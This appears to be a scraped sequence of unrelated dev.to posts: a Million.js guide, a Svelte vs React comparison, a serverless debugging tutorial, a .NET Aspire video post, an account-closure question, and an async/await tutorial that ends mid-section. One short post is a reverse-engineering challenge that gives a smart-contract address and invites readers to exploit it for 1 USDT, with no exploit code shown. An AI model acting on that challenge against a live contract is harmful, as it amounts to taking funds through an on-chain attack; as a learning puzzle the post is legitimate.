* **Learning curve**: The learning curve for Million.js might be steeper for developers accustomed to more mainstream frameworks due to its unique approach and how some of its features work
* **Future updates & support**: As with any newer technology, you might also be concerned about long-term maintenance and support, as the framework's future development and updates are uncertain

Despite these drawbacks, Million.js can still be a viable choice for projects that prioritize lightweight and efficient solutions.

* * *

## Getting started with Million.js

We have discussed the reasons why you should use Million.js in your next React application, along with some potential drawbacks. Let's now take a look at how you can get started with Million.js.

First, create your React application by running the command below:

```bash
yarn create vite
```

Follow the prompts to create your React application and then run `yarn` to install all dependencies. Next, install Million into your project with the command below:

```bash
yarn add million
```

With that done, copy the code below into the `vite.config.js` file of your application:

```javascript
import million from "million/compiler";
import react from "@vitejs/plugin-react";
import { defineConfig } from "vite";

export default defineConfig({
  plugins: [million.vite({ auto: true }), react()],
});
```

Now, you are ready to use Million.js features in your project.

* * *

## Understanding blocks, a key Million.js feature

Million.js introduces a unique concept called a block component. These blocks are the fundamental building blocks for creating user interfaces within your Million.js applications.

Million.js blocks go beyond simple components. They’re wrapped in a special HOC that optimizes their rendering performance.
The HOC analyzes the block's structure and data flow to identify opportunities for efficient updates, leading to smoother and faster UIs.

At their core, blocks are essentially functions that accept an object containing properties (props) that define the block's behavior and appearance. This is similar to how traditional React components work. Here’s an example of how to use blocks in your application:

```javascript
import { block } from "million/react";

const MyFirstMillionComponent = block(function Component() {
  return <h1>I just created my first Million component!</h1>;
});

function App() {
  return (
    <div>
      <MyFirstMillionComponent />
    </div>
  );
}

export default App;
```

In the code block above, we imported `block` from Million, used it to wrap the component, and then rendered the wrapped component inside the `App` component. The result in the browser should look like the image below:

![Example Million Js Text Component On A Black Background](https://blog.logrocket.com/wp-content/uploads/2024/06/Example-Million-js-component-e1719336408702.png)

There are certain rules you should follow to use the block component effectively. When declaring a block, you should define it as a variable declaration. For example:

```javascript
const Block = block(() => <h1>Hey Hey</h1>) // ✅ Correct
export default Block;
```

Declaring it any other way is wrong and throws an error. Below are examples of invalid declarations of blocks:

```javascript
console.log(block(() => <h1>Hey Hey</h1>)) // ❌ Wrong
export default block(() => <h1>Hey Hey</h1>) // ❌ Wrong
```

When importing a block, the block component must be imported from `"million/react"` and not from `'million'`, as shown in the code block below:

```javascript
import { block } from 'million/react'; // ✅ Correct
```

The `<For />` component is recommended when displaying a list within a block in Million.js. The `Array.map()` method used in React degrades performance here and is not ideal, especially if the component that holds the list is a block:

```javascript
<For each={items}>
  {(item) => <div key={item}>{item}</div>}
</For>
```

* * *

## Deploying your Million.js project

Million.js offers various options for deploying your application. Some popular options include:

* **Static hosting**: This straightforward approach is ideal for simple Million.js projects. Platforms like Netlify, Vercel, or GitHub Pages allow you to deploy your built static files without any hassle, making them accessible to users
* **Custom server setup**: For more complex applications requiring specific server-side functionalities, you can deploy your Million.js project on a custom server setup. This offers greater control, but demands more technical expertise to manage the server environment

These options give you the flexibility to choose which deployment method is best for your project's needs.

* * *

## Use cases for Million.js

Million.js, with its focus on performance and efficiency, shines in business scenarios where those qualities are critical. Here are some notable use cases:

* **Single-page applications (SPAs)**: Million.js is well-suited to building SPAs due to its small size and efficient rendering. SPAs require seamless navigation and fast loading times, which Million.js can provide, enhancing the user experience
* **Progressive web applications (PWAs)**: Million.js helps create lightweight, responsive PWAs that have offline functionality and low memory usage, delivering optimal performance even on low-end devices
* **Applications with nested data**: Million.js is well suited for applications that utilize nested data. Nested data is typically slow to render due to tree traversal (i.e., going through the entire tree of data to find the data points your application needs), but Million’s optimized blocks make this faster and more elegant.
Some examples of these applications include ecommerce applications and content management systems (CMS)

* * *

## Million.js vs. similar frameworks

Here's a breakdown of how Million.js compares to React, Preact, and Vue.js across key aspects:

<table>
  <thead>
    <tr>
      <th>Feature</th>
      <th>Million.js</th>
      <th>React</th>
      <th>Preact</th>
      <th>Vue.js</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Features</td>
      <td>Limited. Offers a core set of features with a focus on performance and simplicity. The framework is still evolving, so the feature set is expanding</td>
      <td>Extensive. Boasts a vast library of features and third-party components, making it suitable for complex applications</td>
      <td>Similar to React. Focuses on a smaller footprint, but with faster performance. It prioritizes compatibility with existing React code</td>
      <td>Good balance between features and ease of use. Offers a comprehensive built-in feature set and a strong third-party ecosystem</td>
    </tr>
    <tr>
      <td>Performance</td>
      <td>Potentially fastest. Shines in performance due to its focus on an efficient rendering approach</td>
      <td>Good performance. Complex applications with large codebases may experience performance bottlenecks</td>
      <td>Good. Similar to React, but with a potential edge due to its smaller size</td>
      <td>Generally good. Might not be the fastest option compared to Million.js or Preact</td>
    </tr>
    <tr>
      <td>Community</td>
      <td>Smaller, growing</td>
      <td>Very large and active</td>
      <td>Leverages React's community</td>
      <td>Large and active</td>
    </tr>
    <tr>
      <td>Documentation</td>
      <td>Limited, evolving</td>
      <td>Extensive documentation and a wealth of tutorials and learning resources</td>
      <td>Leverages React's resources, but its resources are more limited</td>
      <td>Comprehensive</td>
    </tr>
    <tr>
      <td>Learning curve</td>
      <td>Easier. Might be slightly challenging for developers from other frameworks to pick up, but those already familiar with React will have an easier time learning Million.js</td>
      <td>Moderate due to its JSX syntax and component-based structure</td>
      <td>Moderate. Similar learning curve to React as it shares the same core concepts</td>
      <td>Generally considered moderate, with a balance between simplicity and features</td>
    </tr>
  </tbody>
</table>

This comparison table should give you a good sense of each option’s strengths and whether they’re suited to your use case.

* * *

## Conclusion

This article took an in-depth look at Million.js, an open source, minimalistic JavaScript compiler designed to revolutionize and improve React performance. We looked at the key features of Million.js, along with the advantages and potential drawbacks of using it.

I hope this adoption guide helps you judge whether Million.js is suited to your needs. Have fun using Million.js in your next React application!

---

## Get set up with LogRocket's modern error tracking in minutes:

1. Visit https://logrocket.com/signup/ to get an app ID.
2. Install LogRocket via NPM or script tag. `LogRocket.init()` must be called client-side, not server-side.

NPM:

```bash
npm i --save logrocket
```

```javascript
import LogRocket from 'logrocket';
LogRocket.init('app/id');
```

Script tag (add to your HTML):

```html
<script src="https://cdn.lr-ingest.com/LogRocket.min.js"></script>
<script>window.LogRocket && window.LogRocket.init('app/id');</script>
```

3. (Optional) Install plugins for deeper integrations with your stack:

* Redux middleware
* ngrx middleware
* Vuex plugin

[Get started now](https://lp.logrocket.com/blg/signup)
leemeganj
1,909,128
Svelte and React
Beyond Buttons: A Frontend Showdown - Svelte vs. React Hey there, code enthusiasts! Today, we're...
0
2024-07-02T16:35:32
https://dev.to/expectationshack/svelte-and-react-4j5c
**Beyond Buttons: A Frontend Showdown - Svelte vs. React**

Hey there, code enthusiasts! Today, we're diving into the dynamic world of frontend development and comparing two hot technologies: Svelte and React. Both are rockstars in building user interfaces, but they take different approaches. Let's see which one shines brighter for your next project.

**Svelte: The Compiler with Superpowers**

Svelte is a rising star that takes a unique approach. Unlike React's virtual DOM, Svelte compiles your code into highly optimized vanilla JavaScript during the build phase. This eliminates the need for a virtual DOM, resulting in smaller bundle sizes and potentially faster performance.

**Why Svelte Intrigues Me**

Honestly, the idea of super-clean, compiled code is exciting! Svelte seems ideal for building performant web applications, and its reactive system feels intuitive. As I delve deeper into frontend development at HNG https://hng.tech/internship, I'm definitely eager to explore Svelte alongside React to see which one feels more natural for different project needs.

**React: The OG Component King**

React, developed by Facebook, is a heavyweight champion. It's a JavaScript library that uses a component-based architecture. Imagine building complex UIs by snapping together pre-built, reusable components – that's React's core strength. It offers a mature ecosystem, tons of libraries, and a massive community for support.

**What I Love About React**

As a proud HNG intern yearning to refine my frontend skills https://hng.tech/premuim, React is like the perfect jungle gym. The HNG curriculum utilizes React heavily, and it's fantastic for building interactive experiences. The component structure makes code organization a breeze, and the learning curve, while present, feels manageable thanks to the extensive resources available.

Now, React isn't without its quirks. The virtual DOM (Document Object Model) manipulation can feel opaque for beginners, and setting up a React project can involve a bit of boilerplate code.

**The Verdict: It Depends!**

Both React and Svelte are fantastic tools, each with its strengths. React offers a mature ecosystem and a gentle learning curve, while Svelte boasts blazing-fast performance and a clean development experience.

The best choice depends on your project requirements. Building a complex, interactive app? React might be your champion. Need a blazing-fast, single-page application? Svelte could be your secret weapon.

So, frontend warriors, don't be afraid to experiment! Explore both React and Svelte (there are great job opportunities on the HNG platform https://hng.tech/hire, by the way!), and discover which one empowers you to build the most awesome web experiences!
expectationshack
1,909,127
EVM Reverse Engineering Challenge 0x02
The third challenge it's here. I'll keep it simple like the other ones, but in order to help you out...
27,871
2024-07-02T16:34:19
https://gealber.com/evm-reverse-challenge-0x02
evm, ethereum, challenge, reverseengineer
The third challenge is here. I'll keep it simple like the other ones, but to help you out a bit I will always give you a super useful hint, like in this case. I also suggest you do the challenges in order, because you will possibly need to use exploits from previous challenges.

Here is the address of the contract. Remember to always simulate before actually making the transaction. For that you can use [Tenderly](https://tenderly.co/) or [Temper](https://github.com/EnsoFinance/temper).

No more description, exploit this contract and get 1 USDT!!

```
0xd436932352dECf38720b04Ef172F7FafdEe7Ab6F
```

Hint: I was born in a cross-fire hurricane...
gealber
1,909,125
How do I close my DEV account
I no longer want an account with this system. I want to remove my information. How do I close this...
0
2024-07-02T16:31:25
https://dev.to/michael_riat_4fd70bc4717e/how-do-i-close-my-dev-account-3lk
dev
I no longer want an account with this system. I want to remove my information. How do I close this account?
michael_riat_4fd70bc4717e
1,908,384
Mastering Serverless Debugging
Introduction to Serverless Computing Challenges of Serverless Debugging Disconnected...
20,817
2024-07-02T16:26:02
https://debugagent.com/mastering-serverless-debugging
lambda, tutorial, serverless, developers
- [Introduction to Serverless Computing](#introduction-to-serverless-computing)
- [Challenges of Serverless Debugging](#challenges-of-serverless-debugging)
  * [Disconnected Environments](#disconnected-environments)
  * [Lack of Standardization](#lack-of-standardization)
  * [Limited Debugging Tools](#limited-debugging-tools)
  * [Concurrency and Scale](#concurrency-and-scale)
- [Effective Strategies for Serverless Debugging](#effective-strategies-for-serverless-debugging)
  * [Local Debugging with IDE Remote Capabilities](#local-debugging-with-ide-remote-capabilities)
  * [Using Feature Flags for Debugging](#using-feature-flags-for-debugging)
  * [Staged Rollouts and Canary Deployments](#staged-rollouts-and-canary-deployments)
  * [Comprehensive Logging](#comprehensive-logging)
  * [Embracing Idempotency](#embracing-idempotency)
- [Debugging a Lambda Application Locally with AWS SAM](#debugging-a-lambda-application-locally-with-aws-sam)
  * [Setting Up the Local Environment](#setting-up-the-local-environment)
  * [Running the Hello World Application Locally](#running-the-hello-world-application-locally)
  * [Configuring Remote Debugging](#configuring-remote-debugging)
  * [Handling Debugger Timeouts](#handling-debugger-timeouts)
- [Final Word](#final-word)

Serverless computing has emerged as a transformative approach to deploying and managing applications. The theory is that by abstracting away the underlying infrastructure, developers can focus solely on writing code. While the benefits are clear—scalability, cost efficiency, and performance—debugging serverless applications presents unique challenges. This post explores effective strategies for debugging serverless applications, particularly focusing on AWS Lambda.

Before I proceed I think it's important to disclose a bias: I am personally not a huge fan of Serverless or PaaS after [I was burned badly by PaaS in the past](https://dev.to/codenameone/production-horrors-handling-disasters-public-debrief-1kf6). However, [some smart people like Adam swear by it](https://www.adam-bien.com/) so I should keep an open mind.

{% embed https://youtu.be/B6uyutAbEDw %}

As a side note, if you like the content of this and the other posts in this series, check out my [Debugging book](https://www.amazon.com/dp/1484290410/) that covers this subject. If you have friends that are learning to code, I'd appreciate a reference to my [Java Basics book](https://www.amazon.com/Java-Basics-Practical-Introduction-Full-Stack-ebook/dp/B0CCPGZ8W1/). If you want to get back to Java after a while, check out my [Java 8 to 21 book](https://www.amazon.com/Java-21-Explore-cutting-edge-features/dp/9355513925/).

## Introduction to Serverless Computing

Serverless computing, often referred to as Function as a Service (FaaS), allows developers to build and run applications without managing servers. In this model, cloud providers automatically handle the infrastructure, scaling, and management tasks, enabling developers to focus purely on writing and deploying code. Popular serverless platforms include AWS Lambda, Azure Functions, and Google Cloud Functions.

In contrast, Platform as a Service (PaaS) offers a more managed environment where developers can deploy applications but still need to configure and manage some aspects of the infrastructure. PaaS solutions, such as Heroku and Google App Engine, provide a higher level of abstraction than Infrastructure as a Service (IaaS) but still require some server management.

Kubernetes, [which we recently discussed](https://debugagent.com/why-is-kubernetes-debugging-so-problematic?source=more_series_bottom_blogs), is an open-source container orchestration platform that automates the deployment, scaling, and management of containerized applications. While Kubernetes offers powerful capabilities for managing complex, multi-container applications, it requires significant expertise to set up and maintain.
Serverless computing simplifies this by removing the need for container orchestration and management altogether. The "catch" is two-fold:

* Serverless programming removes the need to understand the servers, but also removes the ability to rely on them, resulting in more complex architectures
* Pricing starts off cheap, practically free. It can quickly escalate, especially in case of an attack or misconfiguration

## Challenges of Serverless Debugging

While serverless architectures offer some benefits, they also introduce unique debugging challenges. The primary issues stem from the inherent complexity and distributed nature of serverless environments. Here are some of the most pressing challenges.

### Disconnected Environments

One of the major hurdles in serverless debugging is the lack of consistency between development, staging, and production environments. While traditional development practices rely on these separate environments to test and validate code changes, serverless architectures often complicate this process. The differences in configuration and scale between these environments can lead to bugs that only appear in production, making them difficult to reproduce and fix.

### Lack of Standardization

The serverless ecosystem is highly fragmented, with various vendors offering different tools and frameworks. This lack of standardization can make it challenging to adopt a unified debugging approach. Each platform has its own set of practices and tools, requiring developers to learn and adapt to multiple environments. This is slowly evolving with some platforms gaining traction, but since this is a vendor-driven industry there are many edge cases.

### Limited Debugging Tools

Traditional debugging tools, such as step-through debugging and breakpoints, are often unavailable in serverless environments. The managed and controlled nature of serverless functions restricts access to these tools, forcing developers to rely on alternative methods, such as logging and remote debugging.

### Concurrency and Scale

Serverless functions are designed to handle high concurrency and scale seamlessly. However, this can introduce issues that are hard to reproduce in a local development environment. Bugs that manifest only under specific concurrency conditions or high load are particularly challenging to debug. Notice that when I discuss concurrency here I'm often referring to race conditions between separate services.

## Effective Strategies for Serverless Debugging

Despite these challenges, several strategies can help make serverless debugging more manageable. By leveraging a combination of local debugging, feature flags, staged rollouts, logging, idempotency, and Infrastructure as Code (IaC), developers can effectively diagnose and fix issues in serverless applications.

### Local Debugging with IDE Remote Capabilities

While serverless functions run in the cloud, you can simulate their execution locally using tools like AWS SAM (Serverless Application Model). This involves setting up a local server that mimics the cloud environment, allowing you to run tests and perform basic trial-and-error debugging.

To get started, you need to install Docker or Docker Desktop, create an AWS account, and set up the AWS SAM CLI. Deploy your serverless application locally using the SAM CLI, which enables you to run the application and simulate Lambda functions on your local machine. Configure your IDE for remote debugging, launching the application in debug mode and connecting your debugger to the local host. Set breakpoints to step through the code and identify issues.

### Using Feature Flags for Debugging

Feature flags allow you to enable or disable parts of your application without deploying new code. This can be invaluable for isolating issues in a live environment.
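As a minimal sketch of the idea (the `flags` object, the `newCheckoutFlow` flag, and the `checkout` function are all hypothetical names, not from this article), a feature-flag check is just a configuration-driven conditional around the feature's code path:

```javascript
// Hypothetical feature-flag sketch: `flags` stands in for whatever
// configuration source (environment variables, a flag service) is used.
const flags = { newCheckoutFlow: process.env.NEW_CHECKOUT === "true" };

// The flagged feature is wrapped in a plain conditional, so it can be
// switched on or off without redeploying the rest of the application.
function checkout(cart) {
  const total = cart.reduce((sum, item) => sum + item.price, 0);
  if (flags.newCheckoutFlow) {
    return { flow: "new", total }; // code path under investigation
  }
  return { flow: "legacy", total }; // stable path for everyone else
}

console.log(checkout([{ price: 5 }, { price: 7 }]));
```

Because the check reads configuration at runtime, flipping `NEW_CHECKOUT` is enough to isolate whether the new path is the source of a bug.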
By toggling specific features on or off, you can narrow down the problematic areas and observe the application’s behavior under different configurations. Implementing feature flags involves adding conditional checks in your code that control the execution of specific features based on the flag’s status. Monitoring the application with different flag settings helps identify the source of bugs and allows you to test fixes without affecting the entire user base. This is essentially "debugging in production."

Working on a new feature? Wrap it in a feature flag, which is effectively akin to wrapping the entire feature (client and server) in if statements. You can then enable it conditionally, globally or on a per-user basis. This means you can test the feature and enable or disable it based on configuration, without redeploying the application.

### Staged Rollouts and Canary Deployments

Deploying changes incrementally can help catch bugs before they affect all users. Staged rollouts involve gradually rolling out updates to a small percentage of users before a full deployment. This allows you to monitor the performance and error logs of the new version in a controlled manner, catching issues early.

Canary deployments take this a step further by deploying new changes to a small subset of instances (canaries) while the rest of the system runs the stable version. If issues are detected in the canaries, you can roll back the changes without impacting the majority of users. This method limits the impact of potential bugs and provides a safer way to introduce updates.

This isn't great, as in some cases some demographics might be more reluctant to report errors. However, for server-side issues this might make sense, as you can see the impact based on server logs and metrics.

### Comprehensive Logging

Logging is one of the most common and essential tools for debugging serverless applications. I wrote and [spoke a lot about logging in the past](https://www.youtube.com/watch?v=53qCLRFcBSs). By logging all relevant data points, including inputs and outputs of your functions, you can trace the flow of execution and identify where things go wrong.

However, excessive logging can increase costs, as serverless billing is often based on execution time and resources used. It’s important to strike a balance between sufficient logging and cost efficiency. Implementing log levels and selectively enabling detailed logs only when necessary can help manage costs while providing the information needed for debugging.

I talk about striking the delicate balance between debuggable code, performance, and cost with logs in the following video. Notice that this is a general best practice and not specific to serverless.

{% embed https://www.youtube.com/watch?v=53qCLRFcBSs %}

### Embracing Idempotency

Idempotency, a key concept from functional programming, ensures that functions produce the same result given the same inputs, regardless of the number of times they are executed. This simplifies debugging and testing by ensuring consistent and predictable behavior.

Designing your serverless functions to be idempotent involves ensuring that they do not have side effects that could alter the outcome when executed multiple times. For example, including timestamps or unique identifiers in your requests can help maintain consistency. Regularly testing your functions to verify idempotency can make it easier to pinpoint discrepancies and debug issues.

Testing is always important, but in serverless and complex deployments it becomes critical. Awareness and embrace of idempotency allows for more testable code and bugs that are easier to reproduce.
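This idea can be sketched minimally as follows (the in-memory `processed` map and the `handle` function are hypothetical illustrations; a real Lambda would persist request IDs in a durable store such as DynamoDB). Keying the work on a caller-supplied unique request ID lets a replayed invocation return the recorded result instead of re-running side effects:

```javascript
// Hypothetical idempotent-handler sketch: `processed` stands in for a
// durable store keyed by a unique, caller-supplied request ID.
const processed = new Map();

function handle(event) {
  // A replayed request returns the stored result; side effects run once.
  if (processed.has(event.requestId)) {
    return processed.get(event.requestId);
  }
  const result = { charged: event.amount }; // the "side effect"
  processed.set(event.requestId, result);
  return result;
}

// Invoking twice with the same requestId performs the work only once.
const first = handle({ requestId: "r-1", amount: 100 });
const second = handle({ requestId: "r-1", amount: 100 });
console.log(first === second); // true: the same stored result is returned
```

With this shape, retries from the platform or from clients are harmless, which also makes bugs far easier to reproduce by replaying the same event.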
## Debugging a Lambda Application Locally with AWS SAM

{% embed https://youtu.be/SlFA-JlTYGM %}

Debugging serverless applications, particularly AWS Lambda functions, can be challenging due to their distributed nature and the limitations of traditional debugging tools. However, AWS SAM (Serverless Application Model) provides a way to simulate Lambda functions locally, enabling developers to test and debug their applications more effectively. I will use it as a sample to explore the process of setting up a local debugging environment, running a sample application, and configuring remote debugging.

### Setting Up the Local Environment

Before diving into the debugging process, it's crucial to set up a local environment that can simulate the AWS Lambda environment. This involves a few key steps:

1. **Install Docker**: Docker is required to run the local simulation of the Lambda environment. You can download Docker or Docker Desktop from the official [Docker website](https://docs.docker.com/get-docker/).
2. **Create an AWS Account**: If you don't already have an AWS account, you need to create one. Follow the instructions on the [AWS account creation page](https://aws.amazon.com/premiumsupport/knowledge-center/create-and-activate-aws-account/).
3. **Set Up AWS SAM CLI**: The AWS SAM CLI is essential for building and running serverless applications locally. You can install it by following the [AWS SAM installation guide](https://docs.aws.amazon.com/serverless-application-model/latest/developerguide/serverless-sam-cli-install.html).

### Running the Hello World Application Locally

To illustrate the debugging process, let's use a simple "Hello World" application. The code for this application can be found in the [AWS Hello World tutorial](https://github.com/shai-almog/HelloLambda).

1. **Deploy Locally**: Use the SAM CLI to deploy the Hello World application locally. This can be done with the following command:

   ```bash
   sam local start-api
   ```

   This command starts a local server that simulates the AWS Lambda cloud environment.

2. **Trigger the Endpoint**: Once the local server is running, you can trigger the endpoint using a `curl` command:

   ```bash
   curl http://localhost:3000/hello
   ```

   This command sends a request to the local server, allowing you to test the function's response.

### Configuring Remote Debugging

While running tests locally is a valuable step, it doesn't provide full debugging capabilities. To debug the application, you need to configure remote debugging. This involves several steps.

First, we need to start the application in debug mode using the following SAM command:

```bash
sam local invoke -d 5858
```

This command pauses the application and waits for a debugger to connect.

Next, we need to configure the IDE for remote debugging. We start by setting up the IDE to connect to the local host for remote debugging. This typically involves creating a new run configuration that matches the remote debugging settings.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0mlv7ij1mypsmg0rzlsk.png)

We can now set breakpoints in the code where we want the execution to pause. This allows us to step through the code and inspect variables and application state just like in any other local application. We can test this by invoking the endpoint, e.g. using `curl`. With the debugger connected, we would stop on the breakpoint like any other tool:

```bash
curl http://localhost:3000/hello
```

The application will pause at the breakpoints you set, allowing you to step through the code.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/yzpgf6da5rpw332ednvm.png)

### Handling Debugger Timeouts

One significant challenge when debugging Lambda functions is the quick timeout setting. Lambda functions are designed to execute quickly, and if they take too long, the costs can become prohibitive. By default, the timeout is set to a short duration, but you can configure this in the `template.yaml` file, e.g.:

```yaml
Resources:
  HelloWorldFunction:
    Type: AWS::Serverless::Function
    Properties:
      Handler: app.lambdaHandler
      Timeout: 60 # timeout in seconds
```

After updating the timeout value, re-issue the `sam build` command to apply the changes.

In some cases, running the application locally might not be enough. You may need to simulate running on the actual AWS stack to get more accurate debugging information. Solutions like SST (Serverless Stack) or MerLoc can help achieve this, though they are specific to AWS and relatively niche.

## Final Word

Serverless debugging requires a combination of strategies to effectively identify and resolve issues. While traditional debugging methods may not always apply, leveraging local debugging, feature flags, staged rollouts, comprehensive logging, idempotency, and IaC can significantly improve your ability to debug serverless applications. As the serverless ecosystem continues to evolve, staying adaptable and continuously updating your debugging techniques will be key to success.

Debugging serverless applications, particularly AWS Lambda functions, can be complex due to their distributed nature and the constraints of traditional debugging tools. However, by leveraging tools like AWS SAM, you can simulate the Lambda environment locally and use remote debugging to step through your code. Adjusting timeout settings and considering advanced simulation tools can further enhance your debugging capabilities.
codenameone
1,909,102
Learn .NET Aspire in French
Last May, during Microsoft Build, .NET Aspire was officially announced. This new stack...
0
2024-07-02T16:24:47
https://dev.to/azure/apprendre-net-aspire-en-francais-94a
dotnet, french, webdev, cloudnative
Last May, during Microsoft Build, .NET Aspire was officially announced. This new cloud-ready stack, designed for .NET, aims to let developers build cloud-native applications quickly and easily. ![.NET Aspire in 6 points](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/95attcw0u23p4mbp77mn.png) Whether it's for a very small application or a complex solution made up of several microservices, .NET Aspire is designed to help you get started quickly and scale with confidence. In the following French-language video, I show you step by step how to add .NET Aspire to an existing application, from the comfort of Visual Studio 2022. {% youtube jJiqqVPDN4w %} ## Chapters - [Setting the context](https://www.youtube.com/live/jJiqqVPDN4w?si=yvGQZUahsJRUVy46&t=484) - [When to use .NET Aspire](https://www.youtube.com/live/jJiqqVPDN4w?si=q1BxJOaOrW3WByS3&t=934) - [The application before adding .NET Aspire](https://www.youtube.com/live/jJiqqVPDN4w?si=q0fj5UJ5MEmWOR_b&t=1484) - [Demo 1 - Adding smart defaults](https://www.youtube.com/live/jJiqqVPDN4w?si=W4oWt2Qez-vxo2Iv&t=2222) - [Developer dashboard](https://www.youtube.com/live/jJiqqVPDN4w?si=v7yQcb7ZK2RF1pm2&t=3411) - [Demo 3 - Orchestration](https://www.youtube.com/live/jJiqqVPDN4w?si=miBtoWcYsymg-e-R&t=3729) - [Demo 4 - Service discovery](https://www.youtube.com/live/jJiqqVPDN4w?si=sGXlFw2lYurF1itF&t=4852) - [Demo 5 - Adding a component](https://www.youtube.com/live/jJiqqVPDN4w?si=0VqiM0t25mlnrzDA&t=5564) - [Deployment](https://www.youtube.com/live/jJiqqVPDN4w?si=0QIGm7OPB37MC48K&t=6279) - [Other languages and resources](https://www.youtube.com/live/jJiqqVPDN4w?si=F3W-b1wmDm4QhlVg&t=6545) ## In Conclusion .NET Aspire may seem complex at first glance, but it's quite the opposite! It is designed to help you get started quickly, whatever the size of your application. 
Use .NET Aspire so that your project offers a better developer experience and a simpler deployment. If you're interested in more content in French, don't hesitate to let me know by leaving a comment below or by reaching out on social media. ## Useful links - Let's Learn .NET – Aspire: https://aka.ms/letslearn/dotnet/aspire - Documentation: https://aka.ms/dotnet-aspire - Workshop content: https://github.com/dotnet-presentations/letslearn-dotnet-aspire
fboucheros
1,909,098
Mastering Async Await in JavaScript for Asynchronous Programming
Introduction Asynchronous programming is a must-have in modern JavaScript development,...
0
2024-07-02T16:19:04
https://antondevtips.com/blog/mastering-async-await-in-javascript-for-asynchronous-programming
webdev, javascript, async, frontend
--- canonical_url: https://antondevtips.com/blog/mastering-async-await-in-javascript-for-asynchronous-programming --- ## Introduction Asynchronous programming is a must-have in modern JavaScript development, allowing developers to perform non-blocking operations, such as fetching data from a server, reading files, or executing time-consuming operations. **ES2017** introduced async functions and the `await` keyword, which are a complete game changer in asynchronous development. This blog post is a guide to using **async/await** to handle asynchronous tasks in an elegant way. > **_On my website: [antondevtips.com](https://antondevtips.com/blog/mastering-async-await-in-javascript-for-asynchronous-programming?utm_source=devto&utm_medium=social&utm_campaign=02_07_24) I already have JavaScript blog posts._** > **_[Subscribe](https://antondevtips.com/#subscribe) as more are coming._** ## How To Use Async/Await `async/await` statements allow developers to write asynchronous code that looks and behaves like synchronous code: ```js async function fetchDataAsync() { const response = await fetch("https://jsonplaceholder.typicode.com/posts"); const data = await response.json(); return data; } const data = await fetchDataAsync(); console.log(data); ``` Here the `async` function returns a `Promise<T>`, which holds the data received from the API call. By using the `await` keyword we get this data as the promise result. After the line `const data = await fetchDataAsync();` we can simply write more code as if all operations were executed synchronously. `async/await` offers an elegant way to execute asynchronous operations represented by JavaScript Promises. To learn more about promises [read my blog post](https://antondevtips.com/blog/understanding-javascript-promises-a-guide-to-asynchronous-programming). The `await` keyword can only be used inside `async` functions. 
```js function test() { const data = await fetchDataAsync(); // Syntax error } async function test() { const data = await fetchDataAsync(); // Now ok } ``` ## Async/Await in Top-Level Statements With the introduction of ECMAScript 2022, JavaScript supports top-level `await` statements in modules. This allows you to use `await` outside of async functions within modules, simplifying the initialization of resources. ```js const response = await fetch("https://jsonplaceholder.typicode.com/posts"); const data = await response.json(); console.log(data); ``` Outside modules or in older versions of web browsers, you can use the following trick with an anonymous async function to use `await` in top-level statements: ```js (async () => { const response = await fetch("https://jsonplaceholder.typicode.com/posts"); const data = await response.json(); console.log(data); })(); ``` ## Async Methods as Class Members You can encapsulate asynchronous logic within objects by defining async methods in JS classes. It is a good practice to add an `Async` suffix when naming asynchronous functions. 
```js class PostService { async getPostsAsync() { const response = await fetch("https://jsonplaceholder.typicode.com/posts"); const data = await response.json(); return data; } } const postService = new PostService(); const data = await postService.getPostsAsync(); console.log(data); ``` ## Error Handling When Using Async/Await Error handling when using `async/await` is straightforward using a `try/catch` statement: ```js async function fetchDataAsync() { try { const response = await fetch("https://jsonplaceholder.typicode.com/posts"); const data = await response.json(); return data; } catch (error) { console.error("Failed to fetch data: ", error); } } ``` When the `reject` method is called on an awaited promise, an exception is thrown that can be handled in the `catch` block: ```js function testPromise() { return new Promise((resolve, reject) => { setTimeout(() => { reject(new Error("Test Error")); }, 1000); }); } try { const response = await testPromise(); } catch (error) { console.error("Failed to get result: ", error); } ``` ## Using Promise Utility Methods With Async/Await The Promise class has a few static utility methods for asynchronous programming: - Promise.all - Promise.any - Promise.race - Promise.allSettled ### Promise.all You can use the `Promise.all` function to wait for multiple promises to resolve. This function takes an array of promises and returns a new promise that resolves when all of the promises have resolved, or rejects if any promise is rejected. This method is particularly useful when you have multiple asynchronous operations that can be executed in parallel. 
Let's explore an example where we fetch posts, comments and todos using `Promise.all`: ```js async function fetchMultipleResourcesAsync() { const urls = [ "https://jsonplaceholder.typicode.com/posts", "https://jsonplaceholder.typicode.com/comments", "https://jsonplaceholder.typicode.com/todos" ]; try { const promises = urls.map(url => fetch(url)); const responses = await Promise.all(promises); const data = await Promise.all(responses.map(res => res.json())); return data; } catch (error) { console.error("Error fetching one or more resources:", error); } return null; } const data = await fetchMultipleResourcesAsync(); console.log("Posts, comments, todos:", data); ``` It is more efficient to fetch this data in parallel than to fetch posts, comments and todos one by one. ### Promise.any You can use the `Promise.any` function to wait for one of multiple promises to resolve. This function takes an array of promises and returns a single promise that resolves when the first of the promises is resolved. If all the promises are rejected, then the returned promise is rejected with an AggregateError, an exception type that groups together individual errors. ```js async function fetchFirstResourceAsync() { const urls = [ "https://jsonplaceholder.typicode.com/posts", "https://jsonplaceholder.typicode.com/comments", "https://jsonplaceholder.typicode.com/todos" ]; try { const promises = urls.map(url => fetch(url)); const firstResponse = await Promise.any(promises); const data = await firstResponse.json(); return data; } catch (error) { console.error("All requests failed:", error); } return null; } const data = await fetchFirstResourceAsync(); console.log("First available data:", data); ``` ### Promise.race `Promise.race` is similar to `Promise.any`, but it completes as soon as one of the promises is either resolved or rejected. This method is useful for timeout patterns when you need to cancel a request after a certain time. 
